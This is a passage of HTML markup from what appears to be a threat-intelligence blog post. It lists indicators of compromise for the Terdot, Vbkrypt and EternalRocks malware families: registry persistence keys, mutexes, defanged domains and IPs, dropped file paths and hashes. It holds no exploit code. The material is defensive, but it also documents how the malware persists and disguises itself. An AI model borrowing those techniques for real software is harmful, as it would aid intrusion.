/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-Mkaq7GwzNOU/WShRk-waJeI/AAAAAAAABAs/h_Qa0iwuY040CfFXcNqXZU-3LssXircUACLcB/s1600/Pdf_Tool_HeapSprayHeuristic_6316003_1_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://1.bp.blogspot.com/-Mkaq7GwzNOU/WShRk-waJeI/AAAAAAAABAs/h_Qa0iwuY040CfFXcNqXZU-3LssXircUACLcB/s320/Pdf_Tool_HeapSprayHeuristic_6316003_1_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-kktx4tSghRo/WShRpYBj4GI/AAAAAAAABAw/-Iw3TOplMEoqCjxmDCzQZ52nLdgWxCiwgCLcB/s1600/Pdf_Tool_HeapSprayHeuristic_6316003_1_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="261" data-original-width="1237" height="83" src="https://3.bp.blogspot.com/-kktx4tSghRo/WShRpYBj4GI/AAAAAAAABAw/-Iw3TOplMEoqCjxmDCzQZ52nLdgWxCiwgCLcB/s400/Pdf_Tool_HeapSprayHeuristic_6316003_1_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Dropper.Terdot-6320310-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;emptysand[.]ru&lt;/li&gt;&lt;li&gt;dogpaste[.]ru&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;9ae356843ccbda7747e45b292fcf0c3eebbcc4a93101752a0007c9abaa79037a&lt;/li&gt;&lt;li&gt;b9c8630f52d70a8e813e8c46911a1b010fae44ffa786f6a935cb7ffcd7077dda&lt;/li&gt;&lt;li&gt;5aaccf14351ea3bf2b60e9a67ae04eeaca5904fb6802f6d1c05ad27b985fd32d&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;a href="https://4.bp.blogspot.com/-iMv93kZd6g0/WShR1qDDD1I/AAAAAAAABA0/-IvxK6062A833DdHqA4Y3DAe6BNMX4cEACLcB/s1600/DropperTeardot_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://4.bp.blogspot.com/-iMv93kZd6g0/WShR1qDDD1I/AAAAAAAABA0/-IvxK6062A833DdHqA4Y3DAe6BNMX4cEACLcB/s320/DropperTeardot_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-XNkhfDlD-A4/WShR9JP2ahI/AAAAAAAABA4/E6hEspC3H3MNzftsDKE0U7-ZUV2MXYq3ACLcB/s1600/DropperTeardot_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="694" data-original-width="1600" height="172" src="https://3.bp.blogspot.com/-XNkhfDlD-A4/WShR9JP2ahI/AAAAAAAABA4/E6hEspC3H3MNzftsDKE0U7-ZUV2MXYq3ACLcB/s400/DropperTeardot_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-ra8arMX3Exs/WShSCseZ1qI/AAAAAAAABA8/rKlMLm0IrjcGV57deYMI7ZlLoTBQPPbuQCLcB/s1600/emptysand.ru_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="578" data-original-width="1112" height="207" src="https://3.bp.blogspot.com/-ra8arMX3Exs/WShSCseZ1qI/AAAAAAAABA8/rKlMLm0IrjcGV57deYMI7ZlLoTBQPPbuQCLcB/s400/emptysand.ru_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Vbkrypt-10134&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;AutoDetect&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;IntranetName&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;C:\Documents and Settings\Administrator\Application Data\Directory\Windowsdef.exe&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;WindowsDef&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;internat.exe&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\SHELLNOROAM\MUICACHE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Gwogr.bat&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyBypass&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\SHELLNOROAM\MUICACHE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;C:\Documents and Settings\Administrator\Application Data\Directory\Windowsdef.exe&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;C:\Documents and Settings\Administrator\Application Data\bot.exe&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;UNCAsIntranet&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;DoNotAllowExceptions&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Local\ZonesCounterMutex&lt;/li&gt;&lt;li&gt;1BZ5FV6FEI&lt;/li&gt;&lt;li&gt;Local\ZonesLockedCacheCounterMutex&lt;/li&gt;&lt;li&gt;Local\ZonesCacheCounterMutex&lt;/li&gt;&lt;li&gt;Local\ZoneAttributeCacheCounterMutex&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%AppData%\Directory\Windowsdef.exe&lt;/li&gt;&lt;li&gt;%AppData%\bot.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;12cb31c388e382c74397a579992e1f2652464d45630b8c7ae01e6fab03402e10&lt;/li&gt;&lt;li&gt;082898025d2f21461b3d818d2452b900f3401881fc5d719d40855e461bd03b84&lt;/li&gt;&lt;li&gt;724ddead0de7d84c07d4de7d871303530ef2b426ab454150d5fd907a0bb2f339&lt;/li&gt;&lt;li&gt;e437019d08da1936c43214ca6370ebe74b3ddb60a3d80cfa4a26cd3ba606b2f1&lt;/li&gt;&lt;li&gt;3350127c80a88cc69cf7b88993c96ff0497b0b9492eea637cfb9fa13fec04951&lt;/li&gt;&lt;li&gt;6de059771fa64f404f04a43f89512d5f29f0860fd413ebf98371c77664558c99&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-bPsDOTpTKag/WShXqanl_aI/AAAAAAAABBM/NEpKHkGdOYojTTcmmbOzzqWUnB-WOfIqQCLcB/s1600/Win_Trojan_Vbkrypt_10134_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="241" data-original-width="351" height="219" src="https://3.bp.blogspot.com/-bPsDOTpTKag/WShXqanl_aI/AAAAAAAABBM/NEpKHkGdOYojTTcmmbOzzqWUnB-WOfIqQCLcB/s320/Win_Trojan_Vbkrypt_10134_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-UPAPd2H6Hk4/WShXwjH-fuI/AAAAAAAABBQ/S7BYQLyByEYUQ0XCmqo9ct0pVOdLfkTIACLcB/s1600/Win_Trojan_Vbkrypt_10134_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="779" data-original-width="1101" height="282" src="https://4.bp.blogspot.com/-UPAPd2H6Hk4/WShXwjH-fuI/AAAAAAAABBQ/S7BYQLyByEYUQ0XCmqo9ct0pVOdLfkTIACLcB/s400/Win_Trojan_Vbkrypt_10134_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.EternalRocks1&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyEnable&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyServer&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyBypass&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyBypass&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyOverride&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\SystemCertificates\My&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Wow6432Node\Microsoft\EnterpriseCertificates\Root&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\Wow6432Node&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Global\20b70e57-1c2e-4de9-99e5-69f369006912&lt;/li&gt;&lt;li&gt;\BaseNamedObjects\Global\20b70e57-1c2e-4de9-99e5-69f369006912&lt;/li&gt;&lt;li&gt;{8F6F0AC4-B9A1-45fd-A8CF-72FDEFF}&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;82[.]195[.]75[.]101&lt;/li&gt;&lt;li&gt;176[.]9[.]43[.]26&lt;/li&gt;&lt;li&gt;193[.]23[.]244[.]244&lt;/li&gt;&lt;li&gt;52[.]173[.]193[.]166&lt;/li&gt;&lt;li&gt;134[.]19[.]177[.]109&lt;/li&gt;&lt;li&gt;72[.]21[.]81[.]200&lt;/li&gt;&lt;li&gt;192[.]168[.]1[.]245&lt;/li&gt;&lt;li&gt;208[.]83[.]223[.]34&lt;/li&gt;&lt;li&gt;195[.]154[.]12[.]146&lt;/li&gt;&lt;li&gt;192[.]168[.]1[.]1&lt;/li&gt;&lt;li&gt;131[.]188[.]40[.]189&lt;/li&gt;&lt;li&gt;192[.]168[.]1[.]255&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;cs9[.]wpc[.]v0cdn[.]net&lt;/li&gt;&lt;li&gt;archive[.]torproject[.]org&lt;/li&gt;&lt;li&gt;api[.]nuget[.]org&lt;/li&gt;&lt;li&gt;listera[.]torproject[.]org&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net452\it\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\fr\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\es\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\fr\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\Tor\cached-microdescs.new&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\SharpZLib.zip&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\temp\tor.zip&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\Tor\torrc&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\fr\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net35\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\it\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\fr\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net20\it\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%WinDir%\Tasks\Microsoft Tor Host.job&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\de\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\JetBrains.Annotations.dll&lt;/li&gt;&lt;li&gt;%System32%\config\TxR\{016888cc-6c6f-11de-8d1d-001e0bcde3ec}.TxR.blf&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\es\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net452\JetBrains.Annotations.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\temp\Tor\Data\Tor\geoip6&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\Tor\lock&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\fr\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%WinDir%\inf\setupapi.app.log&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net35\it\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\Microsoft.Win32.TaskScheduler.XML&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\es\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\_rels\.rels&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\taskhost.exe&lt;/li&gt;&lt;li&gt;\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RBR0L40R\taskscheduler.2.5.23[1].nupkg&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\es\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net35\Microsoft.Win32.TaskScheduler.XML&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\taskhost.exe&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net452\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\it\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\it\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net35\JetBrains.Annotations.dll&lt;/li&gt;&lt;li&gt;%System32%\Tasks\Microsoft\Windows\Tcpip\TorHost&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net40\de\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\es\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\JetBrains.Annotations.xml&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net35\JetBrains.Annotations.xml&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\svchost.exe&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net35\es\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\SharpZLib\[Content_Types].xml&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\it\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\TaskScheduler\lib\net40\fr\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\Tor\state&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\it\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\temp\tor.zip&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\SharpZLib\package\services\metadata\core-properties\e83d3d4df9744968925840934872efc3.psmdcp&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PR82RPGC\sharpziplib.0.86.0[1].nupkg&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\temp\Tor\Data\Tor\geoip&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\JetBrains.Annotations.xml&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft Updates\Microsoft.Win32.TaskScheduler.dll&lt;/li&gt;&lt;li&gt;%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for SharpZLib.zip\SharpZipLib.nuspec&lt;/li&gt;&lt;li&gt;%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll&lt;/li&gt;&lt;li&gt;\Program Files\Microsoft 